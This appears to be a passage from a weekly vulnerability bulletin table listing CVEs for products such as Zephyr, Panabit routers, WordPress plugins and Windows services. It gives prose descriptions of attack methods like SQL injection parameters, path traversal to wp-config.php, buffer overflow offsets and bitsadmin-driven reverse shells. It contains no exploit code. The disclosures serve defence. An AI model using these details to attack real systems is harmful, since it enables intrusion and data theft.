| zephyrproject-rtos--Zephyr | A bitwise shift vulnerability in Zephyr's PTP subsystem allows a remote attacker to cause undefined behavior and potential system crashes. An attacker sends a crafted PTP_MSG_MANAGEMENT message to set an unvalidated negative log_announce_interval value in the port's data set. When a subsequent PTP_MSG_ANNOUNCE message is processed, port_timer_set_timeout_random computes a timeout as NSEC_PER_SEC >> -log_seconds; if the attacker-supplied value is sufficiently negative (e.g., -127), the shift amount exceeds the 64-bit integer width, triggering undefined behavior in C. This can cause a system crash via a compiler-generated illegal instruction trap on some architectures, or produce an erroneous zero timeout leading to resource starvation loops or other logical errors. | 2026-05-22 | not yet calculated | CVE-2026-5072 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-3v98-458v-388r |
| LalanaChami--Pharmacy Management System | API endpoints in LalanaChami Pharmacy Management System (commit 5c3d028) lack authentication middleware. Unauthenticated remote attackers can exploit this to dump all user records (including bcrypt password hashes) via /api/user/getUserData, modify drug inventory, and access private medical prescription data via /api/doctorOder. | 2026-05-19 | not yet calculated | CVE-2026-31071 | https://github.com/LalanaChami/Pharmacy-Mangment-System/tree/5c3d02888631166649856f71d542387114b3010b/backend/routes https://gist.github.com/nedlir/bc8ad4693c53256819280e8f5de49286 |
| Panabit--PAP-XM320 | A command injection vulnerability exists in Panabit PAP-XM320 up to and including V7.7. The web management interface invokes the backend helper /usr/sbin/pappiw and passes user-controlled parameters to it. The helper performs unsafe argument processing using eval, which allows command injection when attacker-controlled input is included in the arguments. As a result, an authenticated remote attacker with access to the management interface may execute arbitrary shell commands. | 2026-05-19 | not yet calculated | CVE-2026-36827 | https://www.panabit.com/ https://secreu.notion.site/CVE-2026-36827-3652c0ab46158036a888ef4a12b104bf |
| Panabit--PAP-XM320 | A command injection vulnerability exists in the /cgi-bin/tools/ajax_cmd endpoint of Panabit PAP-XM320 up to and including v7.7. The CGI component allows authenticated users to execute arbitrary shell commands with root privileges via the action=runcmd parameter. | 2026-05-19 | not yet calculated | CVE-2026-36828 | https://www.panabit.com/ https://secreu.notion.site/CVE-2026-36828-3652c0ab461580f28f50ddc37ce4e1d6 |
| Panabit--PAP-XM320 | An authentication bypass vulnerability exists in the embedded HTTP server of Panabit PAP-XM320 up to and including v7.7. The server validates session cookies using a filesystem existence check based on a user-controlled cookie value without proper sanitization, allowing directory traversal and bypass of authentication. | 2026-05-19 | not yet calculated | CVE-2026-36829 | https://www.panabit.com/ https://secreu.notion.site/CVE-2026-36829-3652c0ab461580e19704e87b18865714 |
| Uncrustify-- Uncrustify | Buffer Overflow vulnerability in Uncrustify Project Affected v.Uncrustify_d-0.82.0-132-bcc41cbdc and Fixed in commit 68e67b9a1435a1bb173b106fedb4a4f510972bdc allows a local attacker to cause a denial of service via the check_template.cpp, check_template function, tokenize_cleanup function, uncrustify executable components | 2026-05-21 | not yet calculated | CVE-2026-36189 | https://github.com/uncrustify/uncrustify%2Chttps://github.com/uncrustify/uncrustify/issues/4636%2C https://github.com/uncrustify/uncrustify/pull/4641 https://gist.github.com/Criticayon/5da6d6c9cf068e494347c659d01982a9 |
Vulnerability Summary for the Week of May 11, 2026
Posted on Tuesday May 19, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| acl--ACL Analytics | ACL Analytics versions 11.x through 13.0.0.579 contain an arbitrary code execution vulnerability that allows attackers to execute arbitrary commands by leveraging the EXECUTE function. Attackers can use bitsadmin to download malicious PowerShell scripts and execute them with system privileges to establish reverse shells and gain complete system control. | 2026-05-17 | 9.8 | CVE-2018-25320 | ExploitDB-44281 Official Product Homepage Product Reference VulnCheck Advisory: ACL Analytics 11.x - 13.0.0.579 Arbitrary Code Execution |
| gitbucket--GitBucket | GitBucket 4.23.1 contains an unauthenticated remote code execution vulnerability that allows attackers to execute arbitrary commands by exploiting weak secret token generation and insecure file upload functionality. Attackers can brute-force the Blowfish encryption key, upload a malicious JAR plugin via the git-lfs endpoint, and execute system commands through an exposed exploit endpoint. | 2026-05-17 | 9.8 | CVE-2018-25332 | ExploitDB-44668 Official Product Homepage Product Reference VulnCheck Advisory: GitBucket 4.23.1 Unauthenticated Remote Code Execution |
| peugeot-music-plugin--Peugeot Music | WordPress Plugin Peugeot Music 1.0 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by sending POST requests to the upload.php endpoint. Attackers can upload files with arbitrary extensions by manipulating the 'name' parameter to execute code from the uploads directory. | 2026-05-17 | 9.8 | CVE-2018-25335 | ExploitDB-44737 VulnCheck Advisory: WordPress Plugin Peugeot Music 1.0 Arbitrary File Upload |
| Paiement--Ecommerce Systempay | Ecommerce Systempay 1.0 contains a weak cryptographic implementation vulnerability that allows attackers to brute force the 16-character production secret key used for payment signature generation. Attackers can extract payment form data and signatures from POST requests to the payment endpoint, then use SHA1 hash comparison to iteratively test key candidates until discovering the correct production key, enabling them to forge valid payment signatures and manipulate transaction amounts. | 2026-05-13 | 9.8 | CVE-2020-37168 | ExploitDB-48017 Official Product Homepage Product Reference VulnCheck Advisory: Ecommerce Systempay 1.0 Production Key Brute Force |
| Yerootech--iDS6 DSSPro Digital Signage System | iDS6 DSSPro Digital Signage System 6.2 contains a CAPTCHA security bypass vulnerability that allows attackers to bypass authentication by requesting the autoLoginVerifyCode object. Attackers can retrieve valid CAPTCHA codes via the login endpoint and use them to perform brute-force attacks against user accounts. | 2026-05-16 | 9.8 | CVE-2020-37228 | ExploitDB-48991 Vulnerability Advisory Official Product Homepage VulnCheck Advisory: iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass |
| Gegl--libbabl | libbabl 0.1.62 contains a broken double free detection vulnerability that allows attackers to bypass memory safety checks by exploiting signature overwriting in freed chunks. Attackers can call babl_free() twice on the same pointer without triggering detection, as libc's malloc metadata overwrites babl's signature field upon freeing, enabling potential memory corruption and code execution. | 2026-05-16 | 9.8 | CVE-2020-37239 | ExploitDB-49259 Official Product Homepage Product Reference VulnCheck Advisory: libbabl 0.1.62 Broken Double Free Detection Memory Safety |
| Jsonpickle--python jsonpickle | python jsonpickle 2.0.0 contains a remote code execution vulnerability that allows attackers to execute arbitrary Python commands by deserializing malicious JSON payloads containing py/repr objects. Attackers can craft JSON strings with py/repr directives that invoke the eval function during deserialization to execute system commands and arbitrary code. | 2026-05-16 | 9.8 | CVE-2021-47952 | ExploitDB-49585 Official Product Homepage Product Reference VulnCheck Advisory: python jsonpickle 2.0.0 Remote Code Execution via py/repr |
| wp-super-edit--WP Super Edit | WordPress Plugin WP Super Edit 2.5.4 and earlier contains an unrestricted file upload vulnerability in the FCKeditor component that allows attackers to upload dangerous file types without validation. Attackers can upload arbitrary files through the filemanager upload endpoint to achieve remote code execution and complete system compromise. | 2026-05-15 | 9.8 | CVE-2021-47965 | ExploitDB-49839 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin WP Super Edit 2.5.4 Unrestricted File Upload |
| Akilli Commerce Software Technologies Ltd. Co.--E-Commerce Website | Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows Blind SQL Injection. This issue affects E-Commerce Website: before 4.5.001. | 2026-05-14 | 9.8 | CVE-2025-11024 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0222 |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Hitachi Vantara Pentaho Data Integration & Analytics of all versions contain a JDBC driver for H2 databases which is vulnerable to external script execution when a new connection is created by a data source administrator. | 2026-05-13 | 9.1 | CVE-2025-11159 | https://support.pentaho.com/hc/en-us/articles/39954640408077--Resolved-Hitachi-Vantara-Pentaho-Data-Integration-Analytics-Dependency-on-Vulnerable-Third-Party-Component-Versions-before-10-2-0-7-and-11-0-0-0-Impacted-CVE-2025-11159 |
| alloksoft--Fast AVI MPEG Splitter | Allok Fast AVI MPEG Splitter 1.2 contains a stack based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious license name string. Attackers can craft a payload with 780 bytes of junk data followed by structured shellcode and place it in the License Name field to trigger the overflow and execute code with application privileges. | 2026-05-17 | 8.4 | CVE-2018-25322 | ExploitDB-44341 Official Product Homepage Product Reference VulnCheck Advisory: Allok Fast AVI MPEG Splitter 1.2 Stack Based Buffer Overflow |
| Alloksoft--Allok AVI DivX MPEG to DVD Converter | Allok AVI DivX MPEG to DVD Converter 2.6.1217 contains a structured exception handler buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious payload. Attackers can craft a text file with a specially crafted buffer containing shellcode and SEH chain overwrite values, then paste the contents into the License Name field to trigger code execution. | 2026-05-17 | 8.4 | CVE-2018-25323 | ExploitDB-44363 VulnCheck Advisory: Allok AVI DivX MPEG to DVD Converter 2.6.1217 Buffer Overflow SEH |
| vxsearch--VX Search | VX Search 10.6.18 contains a local buffer overflow vulnerability that allows attackers to overwrite the instruction pointer by supplying an oversized string in the directory field. Attackers can craft a malicious input file containing 271 bytes of junk data followed by a return address to execute arbitrary code with application privileges. | 2026-05-17 | 8.4 | CVE-2018-25328 | ExploitDB-44494 Official Product Homepage Official Product Homepage VulnCheck Advisory: VX Search 10.6.18 Local Buffer Overflow via Directory Field |
| Joomlaextensions--Joomla! extension EkRishta | Joomla! extension EkRishta 2.10 contains persistent cross-site scripting and SQL injection vulnerabilities that allow attackers to inject malicious code through profile fields and POST parameters. Attackers can inject script payloads in profile information fields like Address that execute when users visit the profile, or submit SQL injection payloads via the phone_no parameter to the user_setting endpoint to manipulate database queries. | 2026-05-17 | 8.2 | CVE-2018-25330 | ExploitDB-44660 Official Product Homepage Product Reference VulnCheck Advisory: Joomla! EkRishta 2.10 Persistent XSS and SQL Injection |
| nordex-online--N149 Wind Turbine Web Server | Nordex N149/4.0-4.5 Wind Turbine Web Server 4.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the login parameter in login.php. Attackers can submit crafted POST requests with SQL injection payloads in the login field to extract sensitive database information and bypass authentication mechanisms. | 2026-05-17 | 8.2 | CVE-2018-25333 | ExploitDB-44684 Official Product Homepage VulnCheck Advisory: Nordex N149/4.0-4.5 Wind Turbine Web Server SQL Injection |
| Bylancer--Zechat | Zechat 1.5 contains a SQL injection vulnerability in the hashtag parameter that allows unauthenticated attackers to extract database information using union-based techniques. Attackers can exploit the hashtag parameter with union-based payloads to retrieve table and column names. | 2026-05-17 | 8.2 | CVE-2018-25338 | ExploitDB-44685 Official Product Homepage VulnCheck Advisory: Zechat 1.5 SQL Injection via hashtag parameter |
| Bylancer--Zechat | Zechat 1.5 contains a SQL injection vulnerability in the v parameter that allows unauthenticated attackers to extract database information using time-based blind techniques. Attackers can exploit the v parameter with sleep-based blind injection to confirm vulnerability and extract data. | 2026-05-17 | 8.2 | CVE-2018-25339 | ExploitDB-44685 Official Product Homepage VulnCheck Advisory: Zechat 1.5 SQL Injection via v parameter (time-based blind) |
| Hdwplayer--com_hdwplayer | Joomla com_hdwplayer 4.2 contains an SQL injection vulnerability in the search.php file that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the hdwplayersearch parameter. Attackers can submit POST requests with crafted SQL payloads in the hdwplayersearch parameter to extract sensitive database information from the hdwplayer_videos table. | 2026-05-13 | 8.2 | CVE-2020-37218 | ExploitDB-48242 Official Product Homepage Product Reference VulnCheck Advisory: Joomla com_hdwplayer 4.2 SQL Injection via search.php |
| Drive-software--Atomic Alarm Clock | Atomic Alarm Clock 6.3 contains a stack overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string to the display name textbox in the Time Zones Clock configuration. Attackers can craft a buffer with structured exception handling overwrite and encoded shellcode to bypass SafeSEH protections and execute arbitrary commands with application privileges. | 2026-05-13 | 8.4 | CVE-2020-37221 | ExploitDB-48346 VulnCheck Advisory: Atomic Alarm Clock 6.3 Stack Overflow via SEH Unicode |
| Heliossolutions--HS Brand Logo Slider | HS Brand Logo Slider 2.1 contains an unrestricted file upload vulnerability that allows authenticated users to bypass client-side file extension validation by uploading arbitrary files. Attackers can intercept upload requests to the logoupload parameter in the admin interface and rename files to executable extensions .php to achieve remote code execution. | 2026-05-16 | 8.8 | CVE-2020-37227 | ExploitDB-48913 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin HS Brand Logo Slider 2.1 Unrestricted File Upload |
| Supsystic--Ultimate Maps | Supsystic Ultimate Maps 1.1.12 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'sidx' GET parameter. Attackers can send crafted requests to the getListForTbl action with boolean-based blind or time-based blind SQL injection payloads to extract sensitive database information. | 2026-05-16 | 8.2 | CVE-2020-37242 | ExploitDB-49532 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Supsystic Ultimate Maps 1.1.12 SQL Injection via sidx |
| Supsystic--Pricing Table | Supsystic Pricing Table 1.8.7 contains an SQL injection vulnerability in the 'sidx' GET parameter that allows unauthenticated attackers to execute arbitrary SQL queries through the getListForTbl action. The plugin also contains stored cross-site scripting vulnerabilities in the 'Edit name' and 'Edit HTML' fields that execute malicious scripts when viewing pricing tables. | 2026-05-16 | 8.2 | CVE-2020-37243 | ExploitDB-49533 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Supsystic Pricing Table 1.8.7 SQL Injection XSS |
| Supsystic--Membership | Supsystic Membership 1.4.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'search' and 'sidx' parameters. Attackers can send GET requests to the badges module with crafted payloads to extract sensitive database information using time-based blind or UNION-based SQL injection techniques. | 2026-05-16 | 8.2 | CVE-2020-37244 | ExploitDB-49540 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Supsystic Membership 1.4.7 SQL Injection via sidx |
| LayerBB--LayerBB | LayerBB 1.1.4 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the search_query parameter. Attackers can send POST requests to /search.php with malicious search_query values using CASE WHEN statements to extract sensitive database information. | 2026-05-16 | 8.2 | CVE-2021-47954 | ExploitDB-49593 VulnCheck Advisory: LayerBB 1.1.4 SQL Injection via search_query Parameter |
| Egavilanmedia--EgavilanMedia PHPCRUD | EgavilanMedia PHPCRUD 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the firstname parameter. Attackers can send POST requests to insert.php with malicious firstname values to extract sensitive database information. | 2026-05-16 | 8.2 | CVE-2021-47956 | ExploitDB-49878 Official Product Homepage Product Reference VulnCheck Advisory: EgavilanMedia PHPCRUD 1.0 SQL Injection via firstname |
| Schlix--Schlix CMS | Schlix CMS 2.2.6-6 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious extension packages through the block manager. Attackers can upload a crafted ZIP file containing PHP code in the packageinfo.inc file and trigger execution by accessing the About tab of the installed extension. | 2026-05-15 | 8.8 | CVE-2021-47964 | ExploitDB-49838 Official Product Homepage Product Reference VulnCheck Advisory: Schlix CMS 2.2.6-6 Remote Code Execution via core.blockmanager |
| Timeclock--PHP Timeclock | PHP Timeclock 1.04 contains time-based and boolean-based blind SQL injection vulnerabilities in the login_userid parameter of login.php that allows unauthenticated attackers to extract database contents. Attackers can submit crafted POST requests with SQL payloads using SLEEP functions or RLIKE conditional statements to dump sensitive database information including employee names and credentials. | 2026-05-15 | 8.2 | CVE-2021-47966 | ExploitDB-49849 Official Product Homepage Product Reference VulnCheck Advisory: PHP Timeclock 1.04 SQL Injection via login.php |
| Textpattern--TextPattern CMS | TextPattern CMS 4.9.0-dev contains a remote code execution vulnerability that allows authenticated attackers to upload arbitrary PHP files by exploiting the plugin upload functionality. Attackers can authenticate, retrieve a CSRF token from the plugin event page, and upload malicious PHP files to the textpattern/tmp/ directory for code execution. | 2026-05-16 | 8.8 | CVE-2021-47976 | ExploitDB-50095 Official Product Homepage Product Reference VulnCheck Advisory: TextPattern CMS 4.9.0-dev Authenticated Remote Code Execution via Plugin Upload |
| Miniorange--Backup and Restore | WordPress Plugin Backup and Restore 1.0.3 contains an arbitrary file deletion vulnerability that allows authenticated attackers to delete files by manipulating parameters in AJAX requests. Attackers can send POST requests to admin-ajax.php with crafted file_name and folder_name parameters to delete arbitrary files from the WordPress installation directory. | 2026-05-16 | 8.8 | CVE-2021-47979 | ExploitDB-50503 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Backup and Restore 1.0.3 Arbitrary File Deletion |
| WSO2--WSO2 Identity Server | The Magic Link authentication flow accepts multiple invalid authentication requests without adequate rate limiting or resource control, leading to uncontrolled memory usage growth. This vulnerability can result in a denial-of-service condition, causing service unavailability for deployments that utilize the Magic Link authenticator. The impact is limited to these specific deployments and requires repeated invalid authentication attempts to trigger. | 2026-05-11 | 8.6 | CVE-2025-10470 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4469/ |
| APPYAP Technology and Information Inc.--Yaay Social Media App | Authorization bypass through User-Controlled key vulnerability in APPYAP Technology and Information Inc. Yaay Social Media App allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Yaay Social Media App: from 3.8.0 through 24102025. | 2026-05-14 | 8.8 | CVE-2025-12008 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0238 |
| Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc.--Library Automation System | Incorrect Authorization vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Library Automation System: from v.19.5 before v.22.1. | 2026-05-14 | 8.8 | CVE-2025-15023 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240 |
| Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc.--Library Automation System | Improper Control of Generation of Code ('Code Injection') vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Remote Code Inclusion. This issue affects Library Automation System: from v.19.5 before v.22.1. | 2026-05-14 | 8.8 | CVE-2025-15024 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240 |
| Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc.--Library Automation System | Authorization bypass through User-Controlled key vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Exploitation of Trusted Identifiers. This issue affects Library Automation System: from v.21.6 before v.22.1. | 2026-05-14 | 8.8 | CVE-2025-15025 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240 |
| wende60--Redaxo CMS Addon MyEvents | Redaxo CMS Addon MyEvents 2.2.1 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the myevents_id parameter. Attackers can send GET requests to the event_add.php page with malicious myevents_id values to extract or modify sensitive database information. | 2026-05-17 | 7.1 | CVE-2018-25319 | ExploitDB-44261 Official Product Homepage VulnCheck Advisory: Redaxo CMS Addon MyEvents 2.2.1 SQL Injection via event_add.php |
| woocommerce-csvimport--WooCommerce CSV-Importer | Woocommerce CSV Importer 3.3.6 contains a path traversal vulnerability that allows any registered user to delete arbitrary files by submitting unescaped filenames through the delete_export_file AJAX action. Attackers can craft POST requests with directory traversal sequences in the filename parameter to delete sensitive files like wp-config.php outside the intended export directory. | 2026-05-17 | 7.5 | CVE-2018-25325 | ExploitDB-44433 Official Product Homepage VulnCheck Advisory: Woocommerce CSV Importer 3.3.6 Path Traversal File Deletion |
| wp-google-drive--Google Drive | Google Drive for WordPress 2.2 contains a path traversal vulnerability that allows unauthenticated attackers to read arbitrary files by injecting directory traversal sequences in the file_name parameter. Attackers can send POST requests to gdrive-ajaxs.php with the ajaxstype parameter set to del_fl_bkp and file_name containing traversal sequences ../../wp-config.php to access sensitive configuration files. | 2026-05-17 | 7.5 | CVE-2018-25326 | ExploitDB-44435 Official Product Homepage VulnCheck Advisory: Google Drive for WordPress 2.2 Path Traversal RCE via gdrive-ajaxs.php |
| wp-with-spritz--WP with Spritz | WordPress Plugin WP with Spritz 1.0 contains a remote file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by injecting file paths into the url parameter. Attackers can send GET requests to wp.spritz.content.filter.php with malicious url values to access sensitive files like system configuration and credentials. | 2026-05-17 | 7.5 | CVE-2018-25329 | ExploitDB-44544 Product Reference VulnCheck Advisory: WordPress Plugin WP with Spritz 1.0 Remote File Inclusion |
| Fabrikar--com_fabrik | Joomla com_fabrik 3.9.11 contains a directory traversal vulnerability that allows unauthenticated attackers to list arbitrary files by manipulating the folder parameter. Attackers can send GET requests to the onAjax_files method with path traversal sequences to enumerate files in system directories outside the intended web root. | 2026-05-13 | 7.5 | CVE-2020-37219 | ExploitDB-48263 Official Product Homepage Product Reference VulnCheck Advisory: Joomla com_fabrik 3.9.11 Directory Traversal via image.php |
| www.huawei.com--Huawei HG630 Router | Huawei HG630 V2 router contains an authentication bypass vulnerability that allows unauthenticated attackers to obtain administrative access by retrieving the device serial number. Attackers can query the /api/system/deviceinfo endpoint without authentication to extract the SerialNumber field, then use the last 8 characters as the default password to login to the router. | 2026-05-13 | 7.5 | CVE-2020-37220 | ExploitDB-48310 Reference VulnCheck Advisory: Huawei HG630 V2 Router Authentication Bypass via Serial Number |
| Kuicms--Kuicms Php EE | Kuicms Php EE 2.0 contains a persistent cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting crafted content through the bbs reply endpoint. Attackers can send POST requests to /web/?c=bbs&a=reply with HTML and JavaScript payloads in the content parameter to execute arbitrary scripts in users' browsers. | 2026-05-13 | 7.2 | CVE-2020-37222 | ExploitDB-48526 Official Product Homepage Product Reference VulnCheck Advisory: Kuicms Php EE 2.0 Persistent Cross-Site Scripting via bbs reply |
| Iobit--IObit Uninstaller | IObit Uninstaller 9.5.0.15 contains an unquoted service path vulnerability in the IObitUnSvr service that allows local attackers to escalate privileges to SYSTEM level. Attackers can place a malicious executable named IObit.exe in the C:\Program Files (x86)\IObit directory and restart the service to execute code with SYSTEM privileges. | 2026-05-13 | 7.8 | CVE-2020-37223 | ExploitDB-48543 Official Product Homepage Product Reference VulnCheck Advisory: IObit Uninstaller 9.5.0.15 Unquoted Service Path Privilege Escalation |
| Joomsky--J2 JOBS | Joomla J2 JOBS 1.3.0 contains an authenticated SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'sortby' parameter. Attackers can send POST requests to the administrator index with malicious 'sortby' values to extract sensitive database information. | 2026-05-13 | 7.1 | CVE-2020-37224 | ExploitDB-48648 Official Product Homepage Product Reference VulnCheck Advisory: Joomla J2 JOBS 1.3.0 Authenticated SQL Injection via sortby |
| Joomsky--J2 JOBS | Joomla J2 JOBS 1.3.0 contains an authenticated SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'sortby' parameter. Attackers can send POST requests to the administrator index with malicious 'sortby' values to extract sensitive database information using automated tools. | 2026-05-13 | 7.1 | CVE-2020-37226 | ExploitDB-48670 Official Product Homepage Product Reference VulnCheck Advisory: Joomla J2 JOBS 1.3.0 Authenticated SQL Injection via sortby |
| Oki--OKI sPSV Port Manager | OKI sPSV Port Manager 1.0.41 contains an unquoted service path vulnerability in the sPSVOpLclSrv service that allows local attackers to escalate privileges by inserting executable files into the unquoted path. Attackers can place a malicious executable in a directory within the service path that will execute with LocalSystem privileges when the service restarts or the system reboots. | 2026-05-16 | 7.8 | CVE-2020-37229 | ExploitDB-49005 Official Product Homepage Product Reference VulnCheck Advisory: OKI sPSV Port Manager 1.0.41 Unquoted Service Path Privilege Escalation |
| Syncplify--Syncplify.me Server! | Syncplify.me Server! 5.0.37 contains an unquoted service path vulnerability in the SMWebRestServicev5 service that allows local attackers to escalate privileges by exploiting the unquoted binary path. Attackers can insert a malicious executable into the service path and execute it with LocalSystem privileges when the service restarts or the system reboots. | 2026-05-16 | 7.8 | CVE-2020-37230 | ExploitDB-49009 Official Product Homepage Product Reference VulnCheck Advisory: Syncplify.me Server! 5.0.37 Unquoted Service Path Privilege Escalation |
| Cybertronsoft--Privacy Drive | Privacy Drive 3.17.0 contains an unquoted service path vulnerability in the pdsvc.exe service binary that allows local attackers to escalate privileges by exploiting the service startup process. Attackers can place malicious executables in the unquoted path directories to execute arbitrary code with LocalSystem privileges during service startup or system reboot. | 2026-05-16 | 7.8 | CVE-2020-37231 | ExploitDB-49023 Official Product Homepage Product Reference VulnCheck Advisory: Privacy Drive 3.17.0 Unquoted Service Path Privilege Escalation |
| Iobit--Advanced System Care Service | Advanced System Care Service 13.0.0.157 contains an unquoted service path vulnerability in the AdvancedSystemCareService13 service binary path that allows local attackers to escalate privileges. Attackers can place malicious executables in the system root path that will be executed with LocalSystem privileges during service startup or system reboot. | 2026-05-16 | 7.8 | CVE-2020-37232 | ExploitDB-49049 Official Product Homepage Product Reference VulnCheck Advisory: Advanced System Care Service 13.0.0.157 Unquoted Service Path Privilege Escalation |
| Supsystic--Digital Publications | Supsystic Digital Publications 1.6.9 contains a path traversal vulnerability in the Folder input field that allows attackers to access files outside the web root by injecting directory traversal sequences. Additionally, the plugin fails to sanitize input fields in publication settings, allowing stored cross-site scripting attacks through script injection in parameters like Area Width and Publication Width that execute when publications are viewed or edited. | 2026-05-16 | 7.5 | CVE-2020-37245 | ExploitDB-49542 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Supsystic Digital Publications 1.6.9 Path Traversal XSS |
| Kite--Kite | Kite 4.2.0.1 U1 contains an unquoted service path vulnerability in the KiteService Windows service that allows local attackers to escalate privileges by exploiting the service binary path. Attackers can place a malicious executable in the Program Files directory to be executed with LocalSystem privileges when the service starts. | 2026-05-16 | 7.8 | CVE-2020-37247 | ExploitDB-50975 Official Product Homepage VulnCheck Advisory: Kite 4.2.0.1 U1 Unquoted Service Path Privilege Escalation |
| Home-Assistant--Home Assistant Community Store (HACS) | Home Assistant Community Store (HACS) 1.10.0 contains a path traversal vulnerability that allows unauthenticated attackers to read sensitive files by traversing directories via the /hacsfiles/ endpoint. Attackers can retrieve the .storage/auth file containing user credentials and refresh tokens, then craft valid JWT tokens to gain administrative access to Home Assistant instances. | 2026-05-16 | 7.5 | CVE-2021-47942 | ExploitDB-49495 Official Product Homepage Product Reference VulnCheck Advisory: Home Assistant Community Store 1.10.0 Path Traversal Account Takeover |
| Wpgraphql--WPGraphQL | WordPress Plugin WPGraphQL 1.3.5 contains a denial of service vulnerability that allows unauthenticated attackers to exhaust server resources by sending batched GraphQL queries with duplicated fields. Attackers can send POST requests to the GraphQL endpoint with amplified field duplication payloads to trigger server out-of-memory conditions and MySQL connection errors. | 2026-05-15 | 7.5 | CVE-2021-47959 | ExploitDB-49807 Official Product Homepage VulnCheck Advisory: WordPress Plugin WPGraphQL 1.3.5 Denial of Service |
| AnotherNote--Anote | Anote 1.0 contains a persistent cross-site scripting vulnerability that allows attackers to execute arbitrary code by injecting malicious payloads into markdown files stored within the application. Attackers can craft malicious markdown files with embedded JavaScript that executes system commands when opened, enabling remote code execution on the victim's computer. | 2026-05-15 | 7.2 | CVE-2021-47963 | ExploitDB-49836 Official Product Homepage VulnCheck Advisory: Anote 1.0 Persistent Cross-Site Scripting Remote Code Execution |
| color-notes--Color Notes | Color Notes 1.4 contains a denial of service vulnerability that allows attackers to crash the application by pasting excessively long character strings into note fields. Attackers can generate a payload containing 350,000 repeated characters and paste it twice into a new note to cause the application to stop responding. | 2026-05-16 | 7.5 | CVE-2021-47969 | ExploitDB-49952 VulnCheck Advisory: Color Notes 1.4 Denial of Service via Long Character String |
| macaron-notes-great-notebook--Macaron Notes Gear Notebook | Macaron Notes 5.5 contains a denial of service vulnerability that allows attackers to crash the application by creating notes with excessively long character strings. Attackers can generate a payload containing 350000 repeated characters and paste it into a note field to trigger application crash and stop functionality. | 2026-05-16 | 7.5 | CVE-2021-47970 | ExploitDB-49953 VulnCheck Advisory: Macaron Notes 5.5 Denial of Service via Buffer Overflow |
| my-notes-safe--My Notes Safe | My Notes Safe 5.3 contains a denial of service vulnerability that allows attackers to crash the application by pasting excessively long character strings into note fields. Attackers can generate a payload containing 350000 repeated characters and paste it twice into a new note to trigger an application crash. | 2026-05-16 | 7.5 | CVE-2021-47971 | ExploitDB-49954 VulnCheck Advisory: My Notes Safe 5.3 Denial of Service via Buffer Overflow |
| sticky-notes-color-widgets--Sticky Notes Color Widgets | Sticky Notes & Color Widgets 1.4.2 contains a denial of service vulnerability that allows attackers to crash the application by creating notes with excessively long character strings. Attackers can paste large payloads of repeated characters into note fields to trigger application crashes and make the application stop responding. | 2026-05-16 | 7.5 | CVE-2021-47972 | ExploitDB-49957 VulnCheck Advisory: Sticky Notes & Color Widgets 1.4.2 Denial of Service |
| sticky-notes--Sticky Notes Widget | Sticky Notes Widget 3.0.6 contains a denial of service vulnerability that allows attackers to crash the application by pasting excessively long character strings into note fields. Attackers can generate a payload containing 350000 repeated characters and paste it twice into a new note to trigger an application crash on iOS devices. | 2026-05-16 | 7.5 | CVE-2021-47973 | ExploitDB-49978 VulnCheck Advisory: Sticky Notes Widget 3.0.6 Denial of Service via Buffer Overflow |
| Vxsearch--VX Search | VX Search 13.5.28 contains an unquoted service path vulnerability in both VX Search Server and VX Search Enterprise services that allows local attackers to escalate privileges. Attackers can place malicious executables in unquoted path directories like C:\Program Files\VX Search to execute arbitrary code with LocalSystem privileges when services restart. | 2026-05-16 | 7.8 | CVE-2021-47974 | ExploitDB-50026 Official Product Homepage VulnCheck Advisory: VX Search 13.5.28 Unquoted Service Path Privilege Escalation |
